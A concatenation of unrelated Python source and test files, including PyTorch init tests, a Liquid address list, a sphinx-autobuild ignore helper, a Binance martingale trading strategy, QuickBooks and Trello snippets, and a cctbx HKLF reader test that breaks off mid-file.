"""test Caffe2XavierInit."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = Caffe2XavierInit(bias=0.1, layer='Conv2d')
func(model)
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.1))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.1))
class FooModule(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(1, 2)
self.conv2d = nn.Conv2d(3, 1, 3)
self.conv2d_2 = nn.Conv2d(3, 2, 3)
def test_pretrainedinit():
"""test PretrainedInit class."""
modelA = FooModule()
constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
modelA.apply(constant_func)
modelB = FooModule()
funcB = PretrainedInit(checkpoint='modelA.pth')
modelC = nn.Linear(1, 2)
funcC = PretrainedInit(checkpoint='modelA.pth', prefix='linear.')
with TemporaryDirectory():
torch.save(modelA.state_dict(), 'modelA.pth')
funcB(modelB)
assert torch.equal(modelB.linear.weight,
torch.full(modelB.linear.weight.shape, 1.))
assert torch.equal(modelB.linear.bias,
torch.full(modelB.linear.bias.shape, 2.))
assert torch.equal(modelB.conv2d.weight,
torch.full(modelB.conv2d.weight.shape, 1.))
assert torch.equal(modelB.conv2d.bias,
torch.full(modelB.conv2d.bias.shape, 2.))
assert torch.equal(modelB.conv2d_2.weight,
torch.full(modelB.conv2d_2.weight.shape, 1.))
assert torch.equal(modelB.conv2d_2.bias,
torch.full(modelB.conv2d_2.bias.shape, 2.))
funcC(modelC)
assert torch.equal(modelC.weight, torch.full(modelC.weight.shape, 1.))
assert torch.equal(modelC.bias, torch.full(modelC.bias.shape, 2.))
def test_initialize():
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
foonet = FooModule()
# test layer key
init_cfg = dict(type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
initialize(model, init_cfg)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
assert init_cfg == dict(
type='Constant', layer=['Conv2d', 'Linear'], val=1, bias=2)
# test init_cfg with list type
init_cfg = [
dict(type='Constant', layer='Conv2d', val=1, bias=2),
dict(type='Constant', layer='Linear', val=3, bias=4)
]
initialize(model, init_cfg)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 4.))
assert init_cfg == [
dict(type='Constant', layer='Conv2d', val=1, bias=2),
dict(type='Constant', layer='Linear', val=3, bias=4)
]
# test layer key and override key
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
initialize(foonet, init_cfg)
assert torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 1.))
assert torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 2.))
assert torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 1.))
assert torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 2.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 3.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 4.))
assert init_cfg == dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
# test override key
init_cfg = dict(
type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
initialize(foonet, init_cfg)
assert not torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 5.))
assert not torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 6.))
assert not torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 5.))
assert not torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 6.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 5.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 6.))
assert init_cfg == dict(
type='Constant', val=5, bias=6, override=dict(name='conv2d_2'))
init_cfg = dict(
type='Pretrained',
checkpoint='modelA.pth',
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
modelA = FooModule()
constant_func = ConstantInit(val=1, bias=2, layer=['Conv2d', 'Linear'])
modelA.apply(constant_func)
with TemporaryDirectory():
torch.save(modelA.state_dict(), 'modelA.pth')
initialize(foonet, init_cfg)
assert torch.equal(foonet.linear.weight,
torch.full(foonet.linear.weight.shape, 1.))
assert torch.equal(foonet.linear.bias,
torch.full(foonet.linear.bias.shape, 2.))
assert torch.equal(foonet.conv2d.weight,
torch.full(foonet.conv2d.weight.shape, 1.))
assert torch.equal(foonet.conv2d.bias,
torch.full(foonet.conv2d.bias.shape, 2.))
assert torch.equal(foonet.conv2d_2.weight,
torch.full(foonet.conv2d_2.weight.shape, 3.))
assert torch.equal(foonet.conv2d_2.bias,
torch.full(foonet.conv2d_2.bias.shape, 4.))
assert init_cfg == dict(
type='Pretrained',
checkpoint='modelA.pth',
override=dict(type='Constant', name='conv2d_2', val=3, bias=4))
# test init_cfg type
with pytest.raises(TypeError):
init_cfg = 'init_cfg'
initialize(foonet, init_cfg)
# test override value type
with pytest.raises(TypeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override='conv')
initialize(foonet, init_cfg)
# test override name
with pytest.raises(RuntimeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=dict(type='Constant', name='conv2d_3', val=3, bias=4))
initialize(foonet, init_cfg)
# test list override name
with pytest.raises(RuntimeError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
layer=['Conv2d', 'Linear'],
override=[
dict(type='Constant', name='conv2d', val=3, bias=4),
dict(type='Constant', name='conv2d_3', val=5, bias=6)
])
initialize(foonet, init_cfg)
# test override with args except type key
with pytest.raises(ValueError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
override=dict(name='conv2d_2', val=3, bias=4))
initialize(foonet, init_cfg)
# test override without name
with pytest.raises(ValueError):
init_cfg = dict(
type='Constant',
val=1,
bias=2,
override=dict(type='Constant', val=3, bias=4))
initialize(foonet, init_cfg)
|
src/cryptoadvance/specter/liquid/addresslist.py | aphex3k/specter-desktop | 683 | 12610439 | <reponame>aphex3k/specter-desktop
from ..addresslist import *
from embit.liquid.addresses import addr_decode, to_unconfidential
class LAddress(Address):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._unconfidential = to_unconfidential(self.address)
@property
def unconfidential(self):
return self._unconfidential or self.address
@property
def is_confidential(self):
return self.address != self.unconfidential
class LAddressList(AddressList):
AddressCls = LAddress
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# scriptpubkey dict for lookups of unconf addresses
self._scripts = {}
self._update_scripts()
def _update_scripts(self):
for addr in list(self.keys()):
sc, _ = addr_decode(addr)
if sc and sc not in self._scripts:
self._scripts[sc] = super().__getitem__(addr)
def add(self, *args, **kwargs):
res = super().add(*args, **kwargs)
# update scriptpubkey dict for lookups of unconf addresses
self._update_scripts()
return res
def __contains__(self, addr):
"""finds address by confidential or unconfidential address by converting to scriptpubkey"""
try: # can fail if addr is "Fee", "Dummy" or hex-scriptpubkey
sc, _ = addr_decode(addr)
if sc and self._scripts.__contains__(sc):
return True
except:
pass
return super().__contains__(addr)
def __getitem__(self, addr):
"""finds address by confidential or unconfidential address by converting to scriptpubkey"""
sc, _ = addr_decode(addr)
if sc in self._scripts:
return self._scripts[sc]
return super().__getitem__(addr)
def get(self, addr, default=None):
try:
return self[addr]
except KeyError:
return default
|
src/sphinx_autobuild/ignore.py | kianmeng/sphinx-autobuild | 264 | 12610511 | """Logic for ignoring paths."""
import fnmatch
import os
import re
def get_ignore(regular, regex_based):
"""Prepare the function that determines whether a path should be ignored."""
regular_patterns = regular
regex_based_patterns = [re.compile(r) for r in regex_based]
def ignore(path):
"""Determine if path should be ignored."""
# Any regular pattern matches.
for pattern in regular_patterns:
if fnmatch.fnmatch(path, pattern):
return True
if path.startswith(pattern + os.sep):
return True
# Any regular expression matches.
for regex in regex_based_patterns:
if regex.search(path):
return True
return False
return ignore
|
class_26/strategies/martingle_spot_strategyV3.py | benbenlianghua/51kecheng | 121 | 12610512 | from howtrader.app.cta_strategy import (
CtaTemplate,
StopOrder,
TickData,
BarData,
TradeData,
OrderData
)
from howtrader.app.cta_strategy.engine import CtaEngine
from howtrader.trader.event import EVENT_TIMER
from howtrader.event import Event
from howtrader.trader.object import Status, Direction, Interval, ContractData, AccountData
from howtrader.app.cta_strategy import BarGenerator
from typing import Optional, Union, Tuple
import numpy as np
import talib
from howtrader.trader.event import EVENT_CONTRACT, EVENT_ACCOUNT
class MyArrayManager(object):
"""
For:
1. time series container of bar data
2. calculating technical indicator value
"""
def __init__(self, size: int = 100):
"""Constructor"""
self.count: int = 0
self.size: int = size
self.inited: bool = False
self.open_array: np.ndarray = np.zeros(size)
self.high_array: np.ndarray = np.zeros(size)
self.low_array: np.ndarray = np.zeros(size)
self.close_array: np.ndarray = np.zeros(size)
self.volume_array: np.ndarray = np.zeros(size)
self.open_interest_array: np.ndarray = np.zeros(size)
def update_bar(self, bar: BarData) -> None:
"""
Update new bar data into array manager.
"""
self.count += 1
if not self.inited and self.count >= self.size:
self.inited = True
self.open_array[:-1] = self.open_array[1:]
self.high_array[:-1] = self.high_array[1:]
self.low_array[:-1] = self.low_array[1:]
self.close_array[:-1] = self.close_array[1:]
self.volume_array[:-1] = self.volume_array[1:]
self.open_interest_array[:-1] = self.open_interest_array[1:]
self.open_array[-1] = bar.open_price
self.high_array[-1] = bar.high_price
self.low_array[-1] = bar.low_price
self.close_array[-1] = bar.close_price
self.volume_array[-1] = bar.volume
self.open_interest_array[-1] = bar.open_interest
@property
def open(self) -> np.ndarray:
"""
Get open price time series.
"""
return self.open_array
@property
def high(self) -> np.ndarray:
"""
Get high price time series.
"""
return self.high_array
@property
def low(self) -> np.ndarray:
"""
Get low price time series.
"""
return self.low_array
@property
def close(self) -> np.ndarray:
"""
Get close price time series.
"""
return self.close_array
@property
def volume(self) -> np.ndarray:
"""
Get trading volume time series.
"""
return self.volume_array
@property
def open_interest(self) -> np.ndarray:
"""
Get trading volume time series.
"""
return self.open_interest_array
def sma(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Simple moving average.
"""
result = talib.SMA(self.close, n)
if array:
return result
return result[-1]
def ema(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Exponential moving average.
"""
result = talib.EMA(self.close, n)
if array:
return result
return result[-1]
def kama(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
KAMA.
"""
result = talib.KAMA(self.close, n)
if array:
return result
return result[-1]
def wma(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
WMA.
"""
result = talib.WMA(self.close, n)
if array:
return result
return result[-1]
def apo(
self,
fast_period: int,
slow_period: int,
matype: int = 0,
array: bool = False
) -> Union[float, np.ndarray]:
"""
APO.
"""
result = talib.APO(self.close, fast_period, slow_period, matype)
if array:
return result
return result[-1]
def cmo(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
CMO.
"""
result = talib.CMO(self.close, n)
if array:
return result
return result[-1]
def mom(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
MOM.
"""
result = talib.MOM(self.close, n)
if array:
return result
return result[-1]
def ppo(
self,
fast_period: int,
slow_period: int,
matype: int = 0,
array: bool = False
) -> Union[float, np.ndarray]:
"""
PPO.
"""
result = talib.PPO(self.close, fast_period, slow_period, matype)
if array:
return result
return result[-1]
def roc(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROC.
"""
result = talib.ROC(self.close, n)
if array:
return result
return result[-1]
def rocr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROCR.
"""
result = talib.ROCR(self.close, n)
if array:
return result
return result[-1]
def rocp(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROCP.
"""
result = talib.ROCP(self.close, n)
if array:
return result
return result[-1]
def rocr_100(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ROCR100.
"""
result = talib.ROCR100(self.close, n)
if array:
return result
return result[-1]
def trix(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
TRIX.
"""
result = talib.TRIX(self.close, n)
if array:
return result
return result[-1]
def std(self, n: int, nbdev: int = 1, array: bool = False) -> Union[float, np.ndarray]:
"""
Standard deviation.
"""
result = talib.STDDEV(self.close, n, nbdev)
if array:
return result
return result[-1]
def obv(self, array: bool = False) -> Union[float, np.ndarray]:
"""
OBV.
"""
result = talib.OBV(self.close, self.volume)
if array:
return result
return result[-1]
def cci(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Commodity Channel Index (CCI).
"""
result = talib.CCI(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def atr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Average True Range (ATR).
"""
result = talib.ATR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def natr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
NATR.
"""
result = talib.NATR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def rsi(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Relative Strenght Index (RSI).
"""
result = talib.RSI(self.close, n)
if array:
return result
return result[-1]
def macd(
self,
fast_period: int,
slow_period: int,
signal_period: int,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray, np.ndarray],
Tuple[float, float, float]
]:
"""
MACD.
"""
macd, signal, hist = talib.MACD(
self.close, fast_period, slow_period, signal_period
)
if array:
return macd, signal, hist
return macd[-1], signal[-1], hist[-1]
def adx(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ADX.
"""
result = talib.ADX(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def adxr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
ADXR.
"""
result = talib.ADXR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def dx(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
DX.
"""
result = talib.DX(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def minus_di(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
MINUS_DI.
"""
result = talib.MINUS_DI(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def plus_di(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
PLUS_DI.
"""
result = talib.PLUS_DI(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def willr(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
WILLR.
"""
result = talib.WILLR(self.high, self.low, self.close, n)
if array:
return result
return result[-1]
def ultosc(
self,
time_period1: int = 7,
time_period2: int = 14,
time_period3: int = 28,
array: bool = False
) -> Union[float, np.ndarray]:
"""
Ultimate Oscillator.
"""
result = talib.ULTOSC(self.high, self.low, self.close, time_period1, time_period2, time_period3)
if array:
return result
return result[-1]
def trange(self, array: bool = False) -> Union[float, np.ndarray]:
"""
TRANGE.
"""
result = talib.TRANGE(self.high, self.low, self.close)
if array:
return result
return result[-1]
def boll(
self,
n: int,
dev: float,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Bollinger Channel.
"""
mid = self.sma(n, array)
std = self.std(n, 1, array)
up = mid + std * dev
down = mid - std * dev
return up, down
def keltner(
self,
n: int,
dev: float,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Keltner Channel.
"""
mid = self.sma(n, array)
atr = self.atr(n, array)
up = mid + atr * dev
down = mid - atr * dev
return up, down
def donchian(
self, n: int, array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Donchian Channel.
"""
up = talib.MAX(self.high, n)
down = talib.MIN(self.low, n)
if array:
return up, down
return up[-1], down[-1]
def aroon(
self,
n: int,
array: bool = False
) -> Union[
Tuple[np.ndarray, np.ndarray],
Tuple[float, float]
]:
"""
Aroon indicator.
"""
aroon_down, aroon_up = talib.AROON(self.high, self.low, n)
if array:
return aroon_up, aroon_down
return aroon_up[-1], aroon_down[-1]
def aroonosc(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Aroon Oscillator.
"""
result = talib.AROONOSC(self.high, self.low, n)
if array:
return result
return result[-1]
def minus_dm(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
MINUS_DM.
"""
result = talib.MINUS_DM(self.high, self.low, n)
if array:
return result
return result[-1]
def plus_dm(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
PLUS_DM.
"""
result = talib.PLUS_DM(self.high, self.low, n)
if array:
return result
return result[-1]
def mfi(self, n: int, array: bool = False) -> Union[float, np.ndarray]:
"""
Money Flow Index.
"""
result = talib.MFI(self.high, self.low, self.close, self.volume, n)
if array:
return result
return result[-1]
def ad(self, array: bool = False) -> Union[float, np.ndarray]:
"""
AD.
"""
result = talib.AD(self.high, self.low, self.close, self.volume)
if array:
return result
return result[-1]
def adosc(
self,
fast_period: int,
slow_period: int,
array: bool = False
) -> Union[float, np.ndarray]:
"""
ADOSC.
"""
result = talib.ADOSC(self.high, self.low, self.close, self.volume, fast_period, slow_period)
if array:
return result
return result[-1]
def bop(self, array: bool = False) -> Union[float, np.ndarray]:
"""
BOP.
"""
result = talib.BOP(self.open, self.high, self.low, self.close)
if array:
return result
return result[-1]
class MartingleSpotStrategyV3(CtaTemplate):
"""
1. 马丁策略.
币安邀请链接: https://www.binancezh.pro/cn/futures/ref/51bitquant
币安合约邀请码:51bitquant
## 策略思路
1. 挑选1小时涨幅超过2.6%的币,或者4小涨幅超过4.6%的币, 且上引线不能过长(防止入场),然后入场
2. 利润超过1%,且最高价回调1%后平仓,当然你可以选择自己的参数
3. 如果入场后,没有利润,价格继续下跌。那么入场价格下跌5%后,采用马丁策略加仓。
"""
author = "51bitquant"
# 策略的核心参数.
initial_trading_value = 200 # 首次开仓价值 100USDT.
trading_value_multiplier = 2 # 加仓的比例.
max_increase_pos_count = 5 # 最大的加仓次数
hour_pump_pct = 0.026 # 小时的上涨百分比
four_hour_pump_pct = 0.046 # 四小时的上涨百分比.
high_close_change_pct = 0.03 # 最高价/收盘价 -1, 防止上引线过长.
increase_pos_when_dump_pct = 0.05 # 价格下跌 5%就继续加仓.
exit_profit_pct = 0.01 # 出场平仓百分比 1%
exit_pull_back_pct = 0.01 # 最高价回调超过1%,且利润超过1% 就出场.
trading_fee = 0.00075 # 交易手续费
# 变量
avg_price = 0.0 # 当前持仓的平均价格.
last_entry_price = 0.0 # 上一次入场的价格.
entry_highest_price = 0.0
current_pos = 0.0 # 当前的持仓的数量.
current_increase_pos_count = 0 # 当前的加仓的次数.
total_profit = 0 # 统计总的利润.
parameters = ["initial_trading_value", "trading_value_multiplier", "max_increase_pos_count",
"hour_pump_pct", "four_hour_pump_pct", "high_close_change_pct", "increase_pos_when_dump_pct",
"exit_profit_pct",
"exit_pull_back_pct", "trading_fee"]
variables = ["avg_price", "last_entry_price", "entry_highest_price", "current_pos", "current_increase_pos_count",
"total_profit"]
def __init__(self, cta_engine: CtaEngine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.last_filled_order: Optional[OrderData, None] = None
self.tick: Optional[TickData, None] = None
self.contract: Optional[ContractData, None] = None
self.account: Optional[AccountData, None] = None
self.bg_1hour = BarGenerator(self.on_bar, 1, on_window_bar=self.on_1hour_bar, interval=Interval.HOUR) # 1hour
self.bg_4hour = BarGenerator(self.on_bar, 4, on_window_bar=self.on_4hour_bar, interval=Interval.HOUR) # 4hour
# self.cta_engine.event_engine.register(EVENT_ACCOUNT + 'BINANCE.币名称', self.process_acccount_event)
# self.cta_engine.event_engine.register(EVENT_ACCOUNT + "BINANCE.USDT", self.process_account_event)
self.buy_orders = [] # 买单id列表。
self.sell_orders = [] # 卖单id列表。
self.min_notional = 11 # 最小的交易金额.
def on_init(self):
"""
Callback when strategy is inited.
"""
self.write_log("策略初始化")
self.load_bar(3) # 加载3天的数据.
def on_start(self):
"""
Callback when strategy is started.
"""
self.write_log("策略启动")
def on_stop(self):
"""
Callback when strategy is stopped.
"""
self.write_log("策略停止")
# def process_account_event(self, event: Event):
# self.account: AccountData = event.data
# if self.account:
# print(
# f"self.account: available{self.account.available}, balance:{self.account.balance}, frozen: {self.account.frozen}")
def on_tick(self, tick: TickData):
"""
Callback of new tick data update.
"""
if tick.bid_price_1 > 0 and tick.ask_price_1 > 0:
self.bg_1hour.update_tick(tick)
self.bg_4hour.update_tick(tick)
def on_bar(self, bar: BarData):
"""
Callback of new bar data update.
"""
if self.entry_highest_price > 0:
self.entry_highest_price = max(bar.high_price, self.entry_highest_price)
if self.current_pos * bar.close_price >= self.min_notional:
# 有仓位
if len(self.sell_orders) <= 0 < self.avg_price:
# 有利润平仓的时候
# 清理掉其他买单.
profit_percent = bar.close_price / self.avg_price - 1
profit_pull_back_pct = self.entry_highest_price / bar.close_price - 1
if profit_percent >= self.exit_profit_pct and profit_pull_back_pct >= self.exit_pull_back_pct:
self.cancel_all()
orderids = self.sell(bar.close_price, abs(self.current_pos))
self.sell_orders.extend(orderids)
if len(self.buy_orders) <= 0:
# 考虑加仓的条件: 1) 当前有仓位,且仓位值要大于11USDTyi以上,2)加仓的次数小于最大的加仓次数,3)当前的价格比上次入场的价格跌了一定的百分比。
dump_down_pct = self.last_entry_price / bar.close_price - 1
if self.current_increase_pos_count <= self.max_increase_pos_count and dump_down_pct >= self.increase_pos_when_dump_pct:
# ** 表示的是乘方.
self.cancel_all() # 清理其他卖单.
increase_pos_value = self.initial_trading_value * self.trading_value_multiplier ** self.current_increase_pos_count
price = bar.close_price
vol = increase_pos_value / price
orderids = self.buy(price, vol)
self.buy_orders.extend(orderids)
self.bg_1hour.update_bar(bar)
self.bg_4hour.update_bar(bar)
self.put_event()
def on_1hour_bar(self, bar: BarData):
close_change_pct = bar.close_price / bar.open_price - 1 # 收盘价涨了多少.
high_change_pct = bar.high_price / bar.close_price - 1 # 计算上引线
# 回调一定比例的时候.
if self.current_pos * bar.close_price < self.min_notional: # 10 USDT
# 每次下单要大于等于10USDT, 为了简单设置11USDT.
if close_change_pct >= self.hour_pump_pct and high_change_pct < self.high_close_change_pct and len(
self.buy_orders) == 0:
# 这里没有仓位.
# 重置当前的数据.
self.cancel_all()
self.current_increase_pos_count = 0
self.avg_price = 0
self.entry_highest_price = 0.0
price = bar.close_price
vol = self.initial_trading_value / price
orderids = self.buy(price, vol)
self.buy_orders.extend(orderids) # 以及已经下单的orderids.
def on_4hour_bar(self, bar: BarData):
close_change_pct = bar.close_price / bar.open_price - 1 # 收盘价涨了多少.
high_change_pct = bar.high_price / bar.close_price - 1 # 计算上引线
# 回调一定比例的时候.
if self.current_pos * bar.close_price < self.min_notional:
# 每次下单要大于等于10USDT, 为了简单设置11USDT.
if close_change_pct >= self.four_hour_pump_pct and high_change_pct < self.high_close_change_pct and len(
self.buy_orders) == 0:
# 这里没有仓位.
# 重置当前的数据.
self.cancel_all()
self.current_increase_pos_count = 0
self.avg_price = 0
self.entry_highest_price = 0.0
price = bar.close_price
vol = self.initial_trading_value / price
orderids = self.buy(price, vol)
self.buy_orders.extend(orderids) # 以及已经下单的orderids.
def on_order(self, order: OrderData):
"""
Callback of new order data update.
"""
if order.status == Status.ALLTRADED:
if order.direction == Direction.LONG:
# 买单成交.
self.current_increase_pos_count += 1
self.last_entry_price = order.price # 记录上一次成绩的价格.
self.entry_highest_price = order.price
if not order.is_active():
if order.vt_orderid in self.sell_orders:
self.sell_orders.remove(order.vt_orderid)
elif order.vt_orderid in self.buy_orders:
self.buy_orders.remove(order.vt_orderid)
self.put_event() # 更新UI使用.
def on_trade(self, trade: TradeData):
"""
Callback of new trade data update.
"""
if trade.direction == Direction.LONG:
total = self.avg_price * self.current_pos + trade.price * trade.volume
self.current_pos += trade.volume
self.avg_price = total / self.current_pos
elif trade.direction == Direction.SHORT:
self.current_pos -= trade.volume
# 计算统计下总体的利润.
profit = (trade.price - self.avg_price) * trade.volume
total_fee = trade.volume * trade.price * 2 * self.trading_fee
self.total_profit += profit - total_fee
self.put_event()
def on_stop_order(self, stop_order: StopOrder):
"""
Callback of stop order update.
"""
pass
|
tests/integration/test_account.py | varunbheemaiah/python-quickbooks | 234 | 12610513 | <reponame>varunbheemaiah/python-quickbooks
from datetime import datetime
from quickbooks.objects.account import Account
from tests.integration.test_base import QuickbooksTestCase
class AccountTest(QuickbooksTestCase):
def setUp(self):
super(AccountTest, self).setUp()
self.account_number = datetime.now().strftime('%d%H%M')
self.name = "Test Account {0}".format(self.account_number)
def test_create(self):
account = Account()
account.AcctNum = self.account_number
account.Name = self.name
account.AccountSubType = "CashOnHand"
account.save(qb=self.qb_client)
self.id = account.Id
query_account = Account.get(account.Id, qb=self.qb_client)
self.assertEquals(account.Id, query_account.Id)
self.assertEquals(query_account.Name, self.name)
self.assertEquals(query_account.AcctNum, self.account_number)
def test_update(self):
account = Account.filter(Name=self.name, qb=self.qb_client)[0]
account.Name = "Updated Name {0}".format(self.account_number)
account.save(qb=self.qb_client)
query_account = Account.get(account.Id, qb=self.qb_client)
self.assertEquals(query_account.Name, "Updated Name {0}".format(self.account_number))
|
actions/close_list.py | martezr/stackstorm-trello | 164 | 12610524 | <filename>actions/close_list.py
from lib import action
class CloseListAction(action.BaseAction):
def run(self, list_id, board_id, api_key=None, token=None):
if api_key:
self._set_creds(api_key=api_key, token=token)
trello_list = self._client().get_board(board_id).get_list(list_id)
trello_list.close()
return trello_list.closed
|
doc/example1.py | ajschumacher/plac | 233 | 12610541 | <reponame>ajschumacher/plac<filename>doc/example1.py
# example1.py
def main(dsn):
"Do something with the database"
print("ok")
if __name__ == '__main__':
import sys
n = len(sys.argv[1:])
if n == 0:
sys.exit('usage: python %s dsn' % sys.argv[0])
elif n == 1:
main(sys.argv[1])
else:
sys.exit('Unrecognized arguments: %s' % ' '.join(sys.argv[2:]))
|
iotbx/shelx/tst_hklf.py | whart222/cctbx_project | 155 | 12610588 | <reponame>whart222/cctbx_project
from __future__ import absolute_import, division, print_function
from iotbx.shelx import hklf
from cctbx.array_family import flex
from libtbx.test_utils import approx_equal
from libtbx.test_utils import Exception_expected, show_diff
from six.moves import cStringIO as StringIO
def exercise_hklf_reader():
s = (' 1 2 -1 -23.34 4.56 1\n'
' 2 -3 9 12.45 6.12 2\r\n'
'99999999999999999.9999999.999999\n'
'-999-999-999-9999.99-9999.99-999\r\n'
' 0 0 0 0.00 0.00 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [
(1, 2, -1), (2, -3, 9), (9999, 9999, 9999), (-999, -999, -999), ]
assert approx_equal(r.data(), [-23.34, 12.45, 99999.99, -9999.99, ])
assert approx_equal(r.sigmas(), [4.56, 6.12, 99999.99, -9999.99, ])
assert approx_equal(r.batch_numbers(), [1, 2, 9999, -999, ])
assert approx_equal(r.alphas(), [1, 2, 9999, -999, ])
for ma in r.as_miller_arrays():
assert ma.indices().all_eq(r.indices())
assert ma.anomalous_flag() is False
ma = r.as_miller_arrays()[0]
assert ma.data().all_approx_equal(r.data())
assert ma.sigmas().all_approx_equal(r.sigmas())
ma = r.as_miller_arrays()[1]
assert ma.data().all_eq(r.alphas())
assert ma.sigmas() is None
s = (' 0 2 3 1816.00 20.00\n'
' 0 2 415508.00 138.00\n'
' 0 2 5 4776.00 40.00\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [ (0,2,3), (0,2,4), (0,2,5) ]
assert r.batch_numbers() is None
assert r.alphas() is None
assert r.wavelengths() is None
for end_line in (True, False):
for something_after_end_line in (True, False):
s = (' 1 2 -1 23.34 4.56\n'
' 2 -3 9 12.45 6.12\r\n'
'99999999999999999.9999999.99\n'
'-999-999-999-9999.99-9999.99\n')
if end_line:
s += ' 0 0 0 0.00 0.00\n'
if something_after_end_line:
s += ' -5 1 0 123.45 66.12\n'
s = (s)
r = hklf.reader(file_object=StringIO(s))
assert approx_equal(r.sigmas(), [4.56, 6.12, 99999.99, -9999.99, ])
assert r.batch_numbers() is None
assert r.alphas() is None
assert r.wavelengths() is None
s = ''
try: r = hklf.reader(file_object=StringIO(s))
except RuntimeError: pass
else: raise Exception_expected
s = (' 1 2 -1 23.34 4.56 1\n'
' 2 -3 a9 12.45 6.12 2\n'
' 0 0 0 0.00 0.00 0\n')
try: r = hklf.reader(file_object=StringIO(s))
except Exception: pass
else: raise Exception_expected
s = (' 1 2 -1 23.34 4.56 1 45.36\n'
' 2 -3 9 -12.45 -6.12 2 54.63\n'
' 0 0 0 0.00 0.00 0 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [ (1, 2, -1), (2, -3, 9)]
assert approx_equal(r.data(), [23.34, -12.45])
assert approx_equal(r.sigmas(), [4.56, -6.12])
assert approx_equal(r.batch_numbers(), [1, 2])
assert approx_equal(r.wavelengths(), [45.36, 54.63])
s = (' 1 2 -1 23. 4. 2\n'
' -2 1 3 -1. 3. 1\n'
